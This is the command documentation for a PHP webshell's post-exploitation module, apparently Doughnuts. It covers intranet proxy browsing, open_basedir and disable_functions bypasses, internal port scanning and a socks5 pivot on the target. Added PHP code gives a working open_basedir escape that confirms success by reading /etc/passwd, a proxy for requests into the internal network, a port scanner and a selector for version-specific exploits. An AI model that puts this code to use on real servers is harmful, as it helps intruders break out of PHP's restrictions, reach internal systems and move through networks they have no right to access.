# OTHER

![](/files/-MC0IaUijtAk9XGIBBBr)

### Commands

#### ag/agent

```
    Lightweight intranet browsing.

    eg: agent {url} {method} {data=''} {params=''} {cookie=''} {type=[socket|file_get_contents|curl]{1|2|3},default = 1} {timeout=3} {redirect_method=POST} {redirect_auto=1} {redirect_cookie_use=1} {create_dir=0}
    
    Command Args:
        -u,--url(*)                 [str] url

        -m,--method(*)              [str] method

        -d,--data                   [str] data (Default: '')

        -p,--params                 [str] params (Default: '')

        -c,--cookie                 [str] cookie (Default: '')

        -t,--type                   [int] type (Default: 1)

        -to,--timeout               [float] timeout (Default: 3)

        -re_m,--redirect_method        [str] redirect_method (Default: 'POST')

        --redirect_auto             [int] redirect_auto (Default: 1)

        --redirect_cookie_use        [int] redirect_cookie_use (Default: 1)

        --create_dir                [int] create_dir (Default: 0)
        
```

Lightweight intranet browsing, implemented on top of PHP, with the following characteristics:

* Request method:

  * the request method of the first proxied request can be chosen
  * the request method used for redirects during proxied browsing can be chosen

* Request parameters:

  * currently only custom GET parameters and simple POST parameters are supported
  * POST parameters keep following redirects until the final page

* Cookie management:

  * the cookie sent with the first proxied request can be set
  * whether cookies are sent on redirects during proxied browsing can be chosen

* Proxy method:

  * socket: browses the intranet with PHP's socket functions
  * file\_get\_contents: browses the intranet with PHP's file\_get\_contents function
  * curl: browses the intranet with PHP's curl functions

* Local output:

  * the page content obtained by intranet browsing can be saved as a new local file

The command format is `agent -u{URL of the first request} -m{method of the first request} -d{POST body sent with the request} -p{GET parameters of the first request} -c{cookie carried by the first request} -t{proxy method (socket|file_get_contents|curl)} -to{timeout} -re_m{request method used for redirects} --redirect_auto{whether redirects are followed} --redirect_cookie_use{whether cookies are sent on redirects} --create_dir{whether the content of the last page reached is saved locally}`
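As an added example that is not Doughnuts' own code, the following PHP function reproduces the agent behaviour described above for the `file_get_contents` and `curl` proxy methods: first-request method, POST data that keeps following redirects, GET parameters on the first request only, a configurable redirect method, and optional cookie reuse on redirects. The `socket` method is left out. The function and parameter names and the `10.0.0.5` host in the usage line are assumptions.

```php
<?php
// Added example, not Doughnuts' own code. Mirrors the agent command's options:
// method, data, params, cookie, type (2 file_get_contents, 3 curl), timeout,
// redirect_method, redirect_auto, redirect_cookie_use. Names are assumptions.

function intranet_fetch(string $url, string $method = 'GET', string $data = '',
                        string $params = '', string $cookie = '', int $type = 2,
                        float $timeout = 3.0, string $redirectMethod = 'POST',
                        bool $redirectAuto = true, bool $redirectCookieUse = true,
                        int $maxRedirects = 5): array
{
    $method = strtoupper($method);
    if ($params !== '') {                        // GET params only apply to the first request
        $url .= (strpos($url, '?') === false ? '?' : '&') . $params;
    }
    $sendCookie = $cookie;
    for ($hop = 0; $hop <= $maxRedirects; $hop++) {
        $reqHeaders = ['Content-Type: application/x-www-form-urlencoded'];
        if ($sendCookie !== '') $reqHeaders[] = 'Cookie: ' . $sendCookie;
        $body = $method === 'GET' ? '' : $data;   // POST data keeps following redirects

        if ($type === 3) {                        // curl
            $ch = curl_init($url);
            curl_setopt_array($ch, [
                CURLOPT_RETURNTRANSFER => true, CURLOPT_HEADER => true,
                CURLOPT_FOLLOWLOCATION => false,  // redirects are handled manually below
                CURLOPT_TIMEOUT_MS => (int) ($timeout * 1000),
                CURLOPT_CUSTOMREQUEST => $method, CURLOPT_HTTPHEADER => $reqHeaders,
            ]);
            if ($body !== '') curl_setopt($ch, CURLOPT_POSTFIELDS, $body);
            $raw = curl_exec($ch);
            if ($raw === false) { $e = curl_error($ch); curl_close($ch); return ['status' => 0, 'body' => '', 'error' => $e]; }
            $status = (int) curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
            $hlen = (int) curl_getinfo($ch, CURLINFO_HEADER_SIZE);
            curl_close($ch);
            $respHeaders = preg_split("/\r?\n/", trim(substr($raw, 0, $hlen)));
            $content = substr($raw, $hlen);
        } else {                                  // file_get_contents (type 2)
            $ctx = stream_context_create(['http' => [
                'method' => $method, 'header' => implode("\r\n", $reqHeaders),
                'content' => $body, 'timeout' => $timeout,
                'follow_location' => 0,           // redirects are handled manually below
                'ignore_errors' => true,          // still return the body on 4xx/5xx
            ]]);
            $content = @file_get_contents($url, false, $ctx);
            if ($content === false) return ['status' => 0, 'body' => '', 'error' => 'request failed'];
            $respHeaders = $http_response_header; // populated by file_get_contents
            $status = preg_match('#^HTTP/\S+\s+(\d{3})#', $respHeaders[0], $m) ? (int) $m[1] : 0;
        }

        $location = null; $newCookies = [];
        foreach ($respHeaders as $h) {
            if (stripos($h, 'Location:') === 0) $location = trim(substr($h, 9));
            elseif (stripos($h, 'Set-Cookie:') === 0) $newCookies[] = trim(explode(';', substr($h, 11))[0]);
        }
        if (!$redirectAuto || $location === null || $status < 300 || $status >= 400) {
            return ['status' => $status, 'body' => $content, 'url' => $url];
        }
        if (!preg_match('#^https?://#i', $location)) {   // resolve a relative Location
            $p = parse_url($url);
            $location = $p['scheme'] . '://' . $p['host'] . (isset($p['port']) ? ':' . $p['port'] : '')
                      . ($location[0] === '/' ? $location : rtrim(dirname($p['path'] ?? '/'), '/') . '/' . $location);
        }
        $url = $location;
        $method = strtoupper($redirectMethod);    // agent's redirect_method option
        $sendCookie = $redirectCookieUse
            ? implode('; ', array_filter(array_merge([$cookie], $newCookies)))
            : '';
    }
    return ['status' => 0, 'body' => '', 'error' => 'too many redirects'];
}

// Usage: a POST to an assumed internal host whose redirect is followed with GET.
// $r = intranet_fetch('http://10.0.0.5/login', 'POST', 'user=a&pass=b', '', '', 3, 3.0, 'GET');
// echo $r['status'], ' ', $r['url'], "\n", $r['body'];
```

Redirects are handled by hand rather than with `CURLOPT_FOLLOWLOCATION` or `follow_location` so that the redirect method and the cookie policy can be chosen the way the agent options allow; a library-driven redirect would silently switch to GET and drop the POST body.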

#### bobd

```
    bobd

    (Only for *unix) Try to bypass open_basedir by ini_set and chdir.
        
```

Attempts to bypass the `open_basedir` restriction with `ini_set` and `chdir`.
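As an added example that is not Doughnuts' own code, the following PHP function shows the `ini_set` + `chdir` technique the bobd help text refers to, with a check of `open_basedir` before and after. The function name is an assumption; the technique has been public for years and is not guaranteed to work on every PHP build, so always look at the returned result rather than assuming success.

```php
<?php
// Added example, not Doughnuts' own code: the ini_set + chdir open_basedir
// bypass with before/after checks. Function name is an assumption. *unix only.

function open_basedir_bypass(): array
{
    $before = (string) ini_get('open_basedir');
    if ($before === '') {
        return ['bypassed' => true, 'before' => '', 'after' => '', 'note' => 'no open_basedir set'];
    }
    // 1. Create and enter a scratch directory inside the allowed tree. Seen from
    //    inside it, ".." is the original cwd, which open_basedir permits.
    $scratch = getcwd() . '/' . bin2hex(random_bytes(4));
    if (!@mkdir($scratch) || !@chdir($scratch)) {
        return ['bypassed' => false, 'before' => $before, 'after' => $before, 'note' => 'cannot mkdir/chdir in cwd'];
    }
    // 2. ini_set() may only narrow open_basedir at runtime. ".." resolves to a
    //    directory inside the old value, so it is accepted; but PHP stores the
    //    literal string "..", which is re-resolved against cwd on every check.
    if (@ini_set('open_basedir', '..') === false) {
        chdir('..'); @rmdir($scratch);
        return ['bypassed' => false, 'before' => $before, 'after' => $before, 'note' => 'ini_set refused'];
    }
    // 3. chdir("..") is always inside ".." relative to the current directory,
    //    so we can walk up to the filesystem root.
    for ($i = 0; $i < 64 && getcwd() !== '/'; $i++) {
        if (!@chdir('..')) break;
    }
    // 4. At "/", ".." resolves to "/" itself, so "/" counts as an acceptable narrowing.
    @ini_set('open_basedir', '/');
    @rmdir($scratch);
    $after = (string) ini_get('open_basedir');
    // Verify with a read that the original restriction would have blocked.
    $ok = @file_exists('/etc/passwd') && is_array(@scandir('/'));
    return ['bypassed' => $ok, 'before' => $before, 'after' => $after, 'note' => 'cwd=' . getcwd()];
}

// Usage:
// print_r(open_basedir_bypass());
```

The check at the end matters: `ini_get('open_basedir')` reporting `/` only means the value was accepted, and a build that resolves `..` at set time rather than at check time will still refuse the read.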

#### bdf

```
    bdf

    Try to bypass disable_functions by php7-backtrace-bypass.

    Mode -1 / Mode close:

        Close bdf

    Mode auto:

        Automatically filter and test all bdf modes

    Mode 0:

        Display the current bdf mode

    Mode 1 php7-backtrace(Only for php7.0-7.4 and *unix) :

        Origin:
        - https://github.com/mm0r1/exploits/tree/master/php7-backtrace-bypass

        Targets:
        - 7.0 - all versions to date
        - 7.1 - all versions to date
        - 7.2 - all versions to date
        - 7.3 < 7.3.15 (released 20 Feb 2020)
        - 7.4 < 7.4.3 (released 20 Feb 2020)

    Mode 2 php7-gc(Only for php7.0-7.3 and *unix) :

        Origin:
        - https://github.com/mm0r1/exploits/tree/master/php7-gc-bypass

        Targets:
        - 7.0 - all versions to date
        - 7.1 - all versions to date
        - 7.2 - all versions to date
        - 7.3 - all versions to date

    Mode 3 php7-json(Only for php7.1-7.3):

        Origin:
        - https://github.com/mm0r1/exploits/tree/master/php-json-bypass

        Targets:
        - 7.1 - all versions to date
        - 7.2 < 7.2.19 (released 30 May 2019)
        - 7.3 < 7.3.6 (released 30 May 2019)

    Mode 4 LD_PRELOAD(Only for *unix):

        Need:
        - putenv, mail/error_log/mb_send_mail/imap_email functions enabled

    Mode 5 FFI(Only for *unix and php >= 7.4):

        Author:
        - MorouU

        Need:
        - FFI extension

    Mode 6 COM(Only for windows):

        Need:
        - com_dotnet extension

    Mode 7 imap_open:

        Need:
        - imap extension

    
    Command Args:
        -m,--mode                   [str] mode (Default: '0')
        
```

Supports several ways of bypassing the `disable_functions` restriction; the `mode` argument selects which one is used:

* mode = -1 / close: close bdf.
* mode = 0: show the current `disable_functions` bypass mode.
* mode = auto: automatically filter and try the available modes.
* mode = 1: bypass `disable_functions` with `php7-backtrace`.
* mode = 2: bypass `disable_functions` with `php7-gc`.
* mode = 3: bypass `disable_functions` with `php-json`.
* mode = 4: bypass `disable_functions` with `LD_PRELOAD`.
* mode = 5: bypass `disable_functions` with `FFI`.
* mode = 6: bypass `disable_functions` with `COM`.
* mode = 7: bypass `disable_functions` with `imap_open`.

The command format is `bdf -m {mode}`.
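As an added example that is not Doughnuts' own code, the following PHP preflight check lists which bdf modes the help text above says apply to the current runtime, so you can pick a mode deliberately (or see what `auto` has to choose from). The version ranges, OS and extension requirements are the ones listed in the help; the function name is an assumption, and `imap_mail` is used for the help text's "imap_email" (the PHP imap extension's mail function is `imap_mail`). The version and OS can be overridden to evaluate the version-gated modes for another target, but the extension and `disable_functions` checks always reflect the interpreter the script runs in.

```php
<?php
// Added example, not Doughnuts' own code: lists bdf modes whose documented
// requirements are met. Function name is an assumption.

function bdf_candidate_modes($version = null, $osFamily = null)
{
    $version = $version === null ? PHP_VERSION : $version;
    if ($osFamily === null) {   // PHP_OS_FAMILY exists from 7.2; fall back to PHP_OS
        $osFamily = defined('PHP_OS_FAMILY') ? PHP_OS_FAMILY : (stripos(PHP_OS, 'WIN') === 0 ? 'Windows' : 'Unix');
    }
    $unix = $osFamily !== 'Windows';

    $disabled = array_map('trim', explode(',', (string) ini_get('disable_functions')));
    $usable = function ($f) use ($disabled) {
        return function_exists($f) && !in_array($f, $disabled, true);
    };
    $between = function ($lo, $hi) use ($version) {   // $lo <= version < $hi
        return version_compare($version, $lo, '>=') && version_compare($version, $hi, '<');
    };

    $modes = [];
    // Mode 1 php7-backtrace: 7.0-7.2 (all), 7.3 < 7.3.15, 7.4 < 7.4.3; *unix only
    if ($unix && ($between('7.0.0', '7.3.0') || $between('7.3.0', '7.3.15') || $between('7.4.0', '7.4.3'))) {
        $modes[] = 1;
    }
    // Mode 2 php7-gc: 7.0-7.3 (all); *unix only
    if ($unix && $between('7.0.0', '7.4.0')) {
        $modes[] = 2;
    }
    // Mode 3 php-json: 7.1 (all), 7.2 < 7.2.19, 7.3 < 7.3.6
    if ($between('7.1.0', '7.2.0') || $between('7.2.0', '7.2.19') || $between('7.3.0', '7.3.6')) {
        $modes[] = 3;
    }
    // Mode 4 LD_PRELOAD: putenv plus one of the functions that spawn a helper
    // binary (mail, error_log, mb_send_mail, imap_mail); *unix only
    if ($unix && $usable('putenv')
        && ($usable('mail') || $usable('error_log') || $usable('mb_send_mail') || $usable('imap_mail'))) {
        $modes[] = 4;
    }
    // Mode 5 FFI: PHP >= 7.4 with the FFI extension; *unix only. ffi.enable must
    // also allow it ("true", or "preload" when running under the CLI SAPI).
    $ffiEnable = strtolower((string) ini_get('ffi.enable'));
    $ffiUsable = extension_loaded('ffi')
        && (in_array($ffiEnable, ['1', 'true', 'on'], true) || ($ffiEnable === 'preload' && PHP_SAPI === 'cli'));
    if ($unix && version_compare($version, '7.4.0', '>=') && $ffiUsable) {
        $modes[] = 5;
    }
    // Mode 6 COM: Windows with the com_dotnet extension
    if (!$unix && extension_loaded('com_dotnet')) {
        $modes[] = 6;
    }
    // Mode 7 imap_open: imap extension
    if (extension_loaded('imap') && $usable('imap_open')) {
        $modes[] = 7;
    }
    return $modes;
}

// Usage:
// echo 'PHP ', PHP_VERSION, "\n";
// echo 'disabled: ', ini_get('disable_functions'), "\n";
// echo 'candidate bdf modes: ', (implode(',', bdf_candidate_modes()) ?: 'none'), "\n";
```

Modes 1 to 3 are memory-corruption exploits against specific PHP versions, so an empty candidate list on a patched 7.3/7.4 or any PHP 8 is expected; modes 4 to 7 depend on configuration rather than version and are the ones worth checking on newer interpreters.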

#### ps/portscan

```
    portscan

    Scan intranet ports.

    eg: portscan {ip} {ports} {type=[socket|file_get_contents|curl]{1|2|3},default = 2} {timeout=0.5}
    
    Command Args:
        --ip(*)                     [str] ip

        -p,--ports(*)               [str] ports

        -t,--type                   [int] type (Default: 2)

        -to,--timeout               [float] timeout (Default: 0.5)

```

Implemented on top of PHP, scans the ports of the given IP; the `socket`, `file_get_contents` and `curl` scan methods are supported. The format is `portscan {IP} {port range (??|?-??,??|??,??...)} {scan type (socket|file_get_contents|curl)} {timeout}`
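As an added example that is not Doughnuts' own code, the following PHP scanner accepts the port syntax shown above (`80`, `1-1024`, `22,80,443`, `1-100,8080`) and probes with one of the three methods the help lists (1 socket, 2 file_get_contents, 3 curl). It goes a little beyond the command in making explicit how each method decides "open": the HTTP-based methods see non-HTTP services as protocol errors, which have to be distinguished from connection refusals. The function names and the `10.0.0.5` host are assumptions.

```php
<?php
// Added example, not Doughnuts' own code: port scanner in the three styles the
// portscan command offers. Function names are assumptions.

function parse_ports($spec)
{
    $ports = [];
    foreach (explode(',', $spec) as $item) {
        $item = trim($item);
        if ($item === '') continue;
        if (preg_match('/^(\d+)-(\d+)$/', $item, $m)) {
            $lo = (int) $m[1]; $hi = (int) $m[2];
            if ($lo > $hi) { list($lo, $hi) = [$hi, $lo]; }
            for ($p = $lo; $p <= $hi; $p++) $ports[$p] = true;
        } elseif (ctype_digit($item)) {
            $ports[(int) $item] = true;
        } else {
            throw new InvalidArgumentException("bad port spec: $item");
        }
    }
    $ports = array_filter(array_keys($ports), function ($p) { return $p >= 1 && $p <= 65535; });
    sort($ports);
    return $ports;
}

function probe_port($ip, $port, $type = 2, $timeout = 0.5)
{
    switch ($type) {
        case 1: // socket: plain TCP connect, the most reliable of the three
            $fp = @fsockopen($ip, $port, $errno, $errstr, $timeout);
            if ($fp === false) return false;
            fclose($fp);
            return true;
        case 2: // file_get_contents: an HTTP GET. Any parsable response, 4xx/5xx
                // included, means the port is open. A non-HTTP service makes the
                // wrapper fail with "HTTP request failed", which is still an open port;
                // a refused connection or a timeout is reported differently.
            $ctx = stream_context_create(['http' => ['timeout' => $timeout, 'ignore_errors' => true]]);
            error_clear_last();
            if (@file_get_contents("http://$ip:$port/", false, $ctx) !== false) return true;
            $err = error_get_last();
            return $err !== null && strpos($err['message'], 'HTTP request failed') !== false;
        case 3: // curl: HEAD request. CURLINFO_CONNECT_TIME stays 0 when the TCP
                // connect itself failed or timed out, so judge by it, not by the HTTP result.
            $ch = curl_init("http://$ip:$port/");
            curl_setopt_array($ch, [
                CURLOPT_RETURNTRANSFER => true, CURLOPT_NOBODY => true,
                CURLOPT_CONNECTTIMEOUT_MS => (int) ($timeout * 1000),
                CURLOPT_TIMEOUT_MS => (int) ($timeout * 1000),
            ]);
            curl_exec($ch);
            $connected = curl_getinfo($ch, CURLINFO_CONNECT_TIME) > 0;
            curl_close($ch);
            return $connected;
        default:
            throw new InvalidArgumentException('type must be 1, 2 or 3');
    }
}

function scan_ports($ip, $spec, $type = 2, $timeout = 0.5)
{
    $open = [];
    foreach (parse_ports($spec) as $port) {
        if (probe_port($ip, $port, $type, $timeout)) $open[] = $port;
    }
    return $open;
}

// Usage (assumed internal host):
// print_r(scan_ports('10.0.0.5', '21-25,80,443,8080', 1, 0.5));
```

Prefer the socket method when `fsockopen` is available; the `file_get_contents` and `curl` methods exist for hosts where the socket functions are disabled, and their open/closed verdicts rest on the heuristics commented in the code.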

#### socks

```
    socks

    (Only for *unix) Run a socks5 server on the target system by python.

    eg: socks {port=8888}
    
    Command Args:
        --port                      [int] port (Default: 8888)
        
```

Starts a socks5 server on the target machine; the target must have a Python environment. The format is `socks {port}`.

